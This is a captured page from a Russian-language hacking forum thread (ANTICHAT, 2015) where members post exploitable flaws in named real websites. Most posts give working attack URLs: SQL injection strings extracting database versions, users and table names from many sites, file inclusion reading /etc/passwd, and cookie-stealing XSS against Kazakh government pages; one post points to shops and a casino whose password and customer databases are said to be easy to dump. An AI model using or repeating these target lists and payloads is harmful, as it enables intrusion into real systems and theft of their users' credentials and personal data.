HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 13.08.2015, 16:19
comstream
Познающий
Регистрация: 11.08.2015
Сообщений: 35
С нами: 5661686

Репутация: 0
По умолчанию

Site: cc-comics.pl

Уязвимость: Local File Inclusion

Эксплоит:

Код:
http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Site: www.ctpart.com

Уязвимость: Local File Inclusion

Код:
http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
 
Ответить с цитированием

  #72  
Старый 20.08.2015, 19:15
comstream
Познающий
Регистрация: 11.08.2015
Сообщений: 35
С нами: 5661686

Репутация: 0
По умолчанию

Сайт : http://astana.gov.kz

Уязвимость: XSS

Эксплоит: http://astana.gov.kz/en/resetting/request

В поле

Username or email address:

Post запрос: alert(document.cookie);
 
Ответить с цитированием

  #73  
Старый 07.09.2015, 23:45
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от joelblack  

target: http://www.cymbeline.com

type: SQL Injection

version: 5.1.73

user: cymbeline@localhost

Код:
http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+3,1+--+
target: http://igamer.su

type: SQL Injection

version: 5.1.73

user: db_user_igamer@localhost


Код:
http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+3,1+--+
target: http://www.kirpichi.kz

type: SQL Injection

version: 5.5.44-cll-lve

user: V_8337_KIRPICH@LOCALHOST

Код:
http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+3,1+--+&show=calc
target: http://www.qbele.com.br

type: SQL Injection

version: 5.1.73-rel14.11-log

user: site1371378569@186.202.153.159

Код:
http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user(),table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+information_schema.tables+limit+3,1+--+&qCid=Todas

Цитата:
Сообщение от blud_niy  

Site:
http://www.gorodokboxing.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
Site:
http://www.malnaditimudigere.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
Site:
http://glamdring.baac.or.th
Уязвимость: SQL Injection
Эксплоит:
Код:
http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
Site:
http://web-sayansk.net
Уязвимость: SQL Injection
Эксплоит:
Код:
http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
Site:
http://www.replacement-windows.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name,8,9,10,user(),12,13,14,15,16,17,18,19+from+information_schema.tables+limit+1,1+--+
Site:
http://www.bellebuddy.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
Site:
http://www.babilon-nyelvstudio.hu
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),table_name,10,11,12,13,14,15,16+from+information_schema.tables+limit+3,1+--+
Цитата:
Сообщение от comstream  

Site:
cc-comics.pl
Уязвимость:
Local File Inclusion
Эксплоит:
Код:
http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Site:
www.ctpart.com

Уязвимость: Local File Inclusion

Код:
http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Цитата:
Сообщение от comstream  

Сайт :
http://astana.gov.kz
Уязвимость: XSS
Эксплоит:
http://astana.gov.kz/en/resetting/request
В поле
Username or email address:
Post запрос: alert(document.cookie);
добавил
 
Ответить с цитированием

  #74  
Старый 10.09.2015, 12:11
comstream
Познающий
Регистрация: 11.08.2015
Сообщений: 35
С нами: 5661686

Репутация: 0
По умолчанию

Сайт : http://mod.gov.kz

Уязвимость: XSS

Эксплоит:

Код:
mod.gov.kz/kaz/akciya_k_70yu_letiyu/foto_akciya'"()%26%25alert(document.cookie)/
 
Ответить с цитированием

  #75  
Старый 10.09.2015, 23:54
Metal-Core
Участник форума
Регистрация: 20.09.2011
Сообщений: 182
С нами: 7707926

Репутация: 0
По умолчанию

Сайт : http://4rpg.net/buy2.php?game=lineag...erver=Shillien

Уязвимость: XSS

Эксплоит: http://4rpg.net/buy3.php

Поля

"E-mail", "Ник в игре", "Комментарии" :

Post запрос: 'alert('satanic')
 
Ответить с цитированием

  #76  
Старый 11.09.2015, 13:41
Strannik1236
Новичок
Регистрация: 06.09.2015
Сообщений: 11
С нами: 5624246

Репутация: 0
По умолчанию

Сколько уязвимостей надо найти и что получит победитель?
 
Ответить с цитированием

  #77  
Старый 11.09.2015, 22:22
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Strannik1236  

Сколько уязвимостей надо найти и что получит победитель?
перечитайте первое сообщение
 
Ответить с цитированием

  #78  
Старый 13.09.2015, 08:34
blud_niy
Новичок
Регистрация: 26.07.2015
Сообщений: 8
С нами: 5684726

Репутация: 0
По умолчанию

Site: thewhole9.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.thewhole9.com/event_read.php?id=-2594'+union+select+1,2,version(),4,5,6,7,8,9,user(),table_name,12,13,14,15,16,17+from+information_schema.tables+limit+3,1+--+
Site: domainefoivos.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.domainefoivos.com/news-read.php?id=-10'+union+select+1,version(),3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
Site: zupa.pregrada.hr

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.zupa.pregrada.hr/story.php?id=-276'+union+select+1,version(),3,4,user(),6+--+
Site: obfzgalanta.sk

Уязвимость: SQL Injection

Эксплоит:

Код:
http://obfzgalanta.sk/uniweb/article.php?id=-2719'+union+select+1,version(),3,table_name,user()+from+information_schema.tables+limit+3,1+--+
Site: obfztopolcany.sk

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.obfztopolcany.sk/uniweb/article.php?id=-3178'+union+select+1,version(),3,table_name,user()+from+information_schema.tables+limit+3,1+--+
Site: letzzep.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.letzzep.com/reviewpop.php?id=-30'+union+select+1,table_name,3,4,5,user(),version(),8+from+information_schema.tables+limit+3,1+--+
Site: agrovolyn.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,user()+from+information_schema.tables+limit+3,1+--+
Site: siempreenplay.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
Site: kmbajwa.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://kmbajwa.com/page.php?id=-9'+union+select+1,version(),table_name+from+information_schema.tables+limit+4,1+--+
Site: bhajanawali.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.bhajanawali.com/reading-den/read.php?id=-10'+union+select+1,table_name,3,4+from+information_schema.tables+limit+4,1+--+
 
Ответить с цитированием

  #79  
Старый 22.09.2015, 00:53
ubepkr
Познающий
Регистрация: 17.08.2015
Сообщений: 96
С нами: 5653046

Репутация: 1
По умолчанию

Всем привет!

В ручную пока не особо получается раскручивать, посему не вините))

http://www.24open-casino.com//index....ll=playtech&p= - интернет-казино, на сайте вообще куча косяков с SQLi и XSS, база элементарно вытаскивается, пароли в MD5, куча личной инфы по пользователям.

http://www.fortunataptr.pl/scripts/runner.php?GA= - мыла с акками, пароли в MD5 (SQLi);

http://www.frisbyracetire.net/showproducts.php?catid=2&subcatid= - пароли без шифрования (SQLi);

http://www.yickyak.net/categories.php?catid= - пароли в MD5 (SQLi);

http://www.beavercreekrental.net/RentalCategoryDetails.asp?category_id= - пароли без шифрования (SQLi).
 
Ответить с цитированием

  #80  
Старый 30.09.2015, 13:41
Diadlo
Новичок
Регистрация: 24.09.2015
Сообщений: 19
С нами: 5598326

Репутация: 0
По умолчанию

Сайт: www.metal-rules.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.metal-rules.com/polls/index.php?id=-1%27+UNION+SELECT+1,user(),3,version()+--+
Заодно прошу подсказки. Это я упорот или там нет таблицы с пользователями?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.